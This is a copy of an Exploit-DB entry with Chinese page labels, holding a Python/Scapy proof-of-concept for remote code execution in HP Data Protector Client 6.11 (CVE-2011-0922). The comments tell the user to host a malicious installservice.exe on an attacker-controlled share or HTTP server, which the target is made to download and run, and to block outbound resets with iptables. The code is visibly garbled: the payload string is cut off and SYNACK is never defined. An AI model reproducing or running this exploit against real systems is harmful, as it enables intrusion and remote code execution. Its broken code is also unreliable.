HP Data Protector Client 6.11 – ‘EXEC_SETUP’ Remote Code Execution

  • 作者: fdiskyou
    日期: 2011-05-29
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/17345/
  • # Exploit Title: HP Data Protector Cliet EXEC_SETUP Remote Code Execution Vulnerability PoC (ZDI-11-056)
    # Date: 2011-05-29
    # Author: @fdiskyou
    # e-mail: rui at deniable.org
    # Version: 6.11
    # Tested on: Windows 2003 Server SP2 en
    # CVE: CVE-2011-0922 
    # Notes: ZDI-11-056
    # Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/ 
    # Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
    # The following PoC instructs an HP Data Protector Client to download and install an .exe file. It tries to get the file 
    # from a share (\\pwn2003se.home.it) and if it fails it tries to access the same file via HTTP. To get the PoC working with 
    # this payload share a malicious file via HTTP under http://pwn2003se.home.it/Omniback/i386/installservice.exe.exe and you are done. 
    # Tweak payload to better suit your needs.
    # Since you're crafting packets with Scapy don't forget to use iptables to block the outbound resets or your host will 
    # reset your connection after receiving and unsolicited SYN/ACK that is not associated with any open session/socket. Have Fun.
    # Greetz to all the Exploit-DB Dev Team.
    from scapy.all import *
    if len(sys.argv) != 2:
    print "Usage: ./ZDI-11-056.py <Target IP>"
    target = sys.argv[1]
    payload = ("\x00\x00\x01\xbe"
    SYN=TCP(sport=31337, dport=5555, flags="S")
    my_ack = SYNACK.seq + 1
    print SYNACK.seq
    print my_ack
    ACK=TCP(sport=31337, dport=5555, flags="A", seq=1, ack=my_ack)
    PUSH=TCP(sport=31337, dport=5555, flags="PA", seq=1, ack=my_ack)